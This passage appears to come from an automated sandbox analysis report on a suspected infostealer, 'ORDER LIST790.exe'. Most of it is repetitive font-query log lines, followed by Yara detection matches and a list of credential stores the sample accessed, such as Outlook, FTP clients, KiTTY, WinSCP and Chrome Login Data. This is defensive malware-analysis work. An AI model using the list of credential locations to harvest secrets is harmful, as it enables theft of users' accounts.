          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: ORDER LIST790.exe PID: 1672, type: MEMORYSTR
          Source: C:\Users\user\Desktop\ORDER LIST790.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\ORDER LIST790.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\Desktop\ORDER LIST790.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\ORDER LIST790.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\ORDER LIST790.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management InstrumentationPath Interception111
          Process Injection
          1
